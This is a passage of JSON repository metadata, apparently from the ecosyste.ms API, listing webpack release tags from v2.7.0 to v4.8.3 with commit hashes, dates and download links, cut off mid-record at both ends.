l":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3/manifests"},{"name":"v4.8.2","sha":"c92eabd3be44d4162be0affc9ef368624b0a6e51","kind":"tag","published_at":"2018-05-11T16:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2/manifests"},{"name":"v3.12.0","sha":"cce33c206abaeef26d06b62102adf74a989a4696","kind":"tag","published_at":"2018-05-11T14:50:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0/manifests"},{"name":"v4.8.1","sha":"2986ab1a18e895ac3f2546ac0c70bf73c0fdb679","kind":"tag","published_at":"2018-05-07T21:03:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1/manifests"},{"name":"v4.8.0","sha":"586f9a21768e8bbc6bead6e564a6c7981a42f2d8","kind":"tag","published_at":"2018-05-07T11:39:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0/manifests"},{"name":"v4.7.0","sha":"673c103715b5439bf72ed9767f5189b92ce7d428","kind":"tag","published_at":"2018-05-04T11:57:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"e7c8fa414b718ac98d94a96e2553faceabfbc92f","kind":"tag","published_at":"2018-04-17T16:23:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0/manifests"},{"name":"v4.5.0","sha":"e400445445a2f91d19aa8c79aa7b34b66011e661","kind":"tag","published_at":"2018-04-04T13:07:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0/manifests"},{"name":"v4.4.1","sha":"0e404b8683d79052e3a6b42743bd3061f17a5a5d","kind":"tag","published_at":"2018-03-29T15:28:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"e3bb8c9c8f5a30884b4df01bfbbc772cc1fb8cda","kind":"tag","published_at":"2018-03-29T14:57:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0/manifests"},{"name":"v4.3.0","sha":"54ceb3c04d513ef5c7b78eaf4d391d14cfbe8282","kind":"tag","published_at":"2018-03-27T09:00:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0/manifests"},{"name":"v4.2.0","sha":"d668a23fdc69c61ab80ec8db89a5b49778559534","kind":"tag","published_at":"2018-03-21T08:26:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0/manifests"},{"name":"v4.1.1","sha":"41bb63ad69d0f32c042e74e732cb045b5966c452","kind":"tag","published_at":"2018-03-07T15:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"f916fc0bb70585cf04a92cd99e004e4879f1d337","kind":"tag","published_at":"2018-03-04T10:39:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"5044762c846a3a83a208853e48785a293fe9ef7d","kind":"tag","published_at":"2018-02-26T20:11:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"213226ece261a0e89edb9de15fbc6775418f6041","kind":"tag","published_at":"2018-02-25T02:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0/manifests"},{"name":"v4.0.0-beta.3","sha":"4c25bfbaf2e01cf23708a381319b43367701e5b5","kind":"tag","published_at":"2018-02-24T14:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3/manifests"},{"name":"v4.0.0-beta.2","sha":"2ad530e4b486c248758f6d9d94070f207ef5f2e9","kind":"tag","published_at":"2018-02-17T13:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2/manifests"},{"name":"v3.11.0","sha":"bc840ec8747ba19c9e87629f2959ed2e65a9ffbe","kind":"tag","published_at":"2018-02-10T14:37:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0/manifests"},{"name":"v4.0.0-beta.1","sha":"df65475ba32a5881f48ab9d90e1c010ea57c3d65","kind":"tag","published_at":"2018-02-10T14:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1/manifests"},{"name":"v4.0.0-beta.0","sha":"ae0dc62b7b4cc1ee3170c8ce3dd581ddcfa46a2a","kind":"tag","published_at":"2018-01-24T22:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0/manifests"},{"name":"v4.0.0-alpha.5","sha":"c302bba6a53601dcab5e86dce5778897710c86e1","kind":"tag","published_at":"2018-01-22T14:19:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5/manifests"},{"name":"v4.0.0-alpha.4","sha":"37cc6f4f6ec178d0406dcf816de690cab9b1bf8f","kind":"tag","published_at":"2018-01-06T09:46:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"9334fd8547831ded7f11e05319616a72ea0b4698","kind":"tag","published_at":"2018-01-04T21:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"910d6fd40996189ee990fe90c69ab732cbd9963a","kind":"tag","published_at":"2017-12-22T11:49:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2/manifests"},{"name":"v4.0.0-alpha.1","sha":"9a33e031d16008d690a188a2d784666c8a293b43","kind":"tag","published_at":"2017-12-14T15:08:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1/manifests"},{"name":"v4.0.0-alpha.0","sha":"fd3c8025e5c32e625f68df2b030646a8c2a8467a","kind":"tag","published_at":"2017-12-04T19:52:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0/manifests"},{"name":"v3.10.0","sha":"c71fd05f98a752753b9450f590c970b76379803d","kind":"tag","published_at":"2017-12-04T18:02:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0/manifests"},{"name":"v3.9.1","sha":"5acbe2f72eaa67654904cf8a127c3ed4da12dc99","kind":"tag","published_at":"2017-11-30T17:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"73e34a7306d40ed95d666058ad03e9c14de554af","kind":"tag","published_at":"2017-11-30T13:53:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0/manifests"},{"name":"v3.8.1","sha":"b8e6b4a100a5d5a6387c276eb52d6c7f20954a0b","kind":"tag","published_at":"2017-10-17T15:20:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1/manifests"},{"name":"v3.8.0","sha":"1dc561865ad57d9e862832ccf3579f67a8bbba2d","kind":"tag","published_at":"2017-10-17T09:15:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0/manifests"},{"name":"v3.7.1","sha":"ce24e98bc084bf45a271fb05b14b0e9829686149","kind":"tag","published_at":"2017-10-11T19:39:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"551ea76838f163a1e0fbf65182e2ac08d346a1f3","kind":"tag","published_at":"2017-10-11T18:07:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0/manifests"},{"name":"v3.6.0","sha":"622675993d72c6ea7d70cd2e503fd9416f940b2b","kind":"tag","published_at":"2017-09-15T08:45:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0/manifests"},{"name":"v3.5.6","sha":"92d5c209437f9ef9293571e24cc8dcf10459d578","kind":"tag","published_at":"2017-09-06T15:41:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.6","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6/manifests"},{"name":"v3.5.5","sha":"ef6ab6820a74db730cfec6fd419d2c211d62c0bd","kind":"tag","published_at":"2017-08-16T14:55:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.5","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5/manifests"},{"name":"v3.5.4","sha":"990563f9a2b3fb3e817b7e1b9d6841bcd1eaa51e","kind":"tag","published_at":"2017-08-12T09:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.4","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4/manifests"},{"name":"v3.5.3","sha":"4b2b1ad99b86458983714c589c6495772b1292ee","kind":"tag","published_at":"2017-08-10T13:38:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"25302e51a601b4e30a661d788471e4a50b7a9764","kind":"tag","published_at":"2017-08-09T10:51:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"5be959311a746b976a0a56625cc4372307b351ed","kind":"tag","published_at":"2017-08-08T11:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"75a8ffec0a8ab2f1f07a950ee965a31917af5fe9","kind":"tag","published_at":"2017-08-08T08:50:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0/manifests"},{"name":"v3.4.1","sha":"1f064bc84f222305afada087f9631fd7ae39ea30","kind":"tag","published_at":"2017-07-26T08:48:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"c8732c8d157ed56542d521a557dda7ff7ad12ffb","kind":"tag","published_at":"2017-07-25T14:27:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0/manifests"},{"name":"v3.3.0","sha":"5b119e7c5b437fd48e7e681996b9be10cbd6de34","kind":"tag","published_at":"2017-07-15T13:52:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0/manifests"},{"name":"v2.7.0","sha":"eeea490e8ec0e2341cd4bb6da82aabf6ca139322","kind":"tag","published_at":"2017-07-12T07:00:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0/manifests"},{"name":"v3.2.0","sha":"d0059901266e54a22309c419cad6d9327767c5a3","kind":"tag","published_at":"2017-07-11T20:09:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0/manifests"},{"name":"v3.1.0","sha":"4bb3018da4310deaeff52b8a1c2b5645282b9994","kind":"tag","pub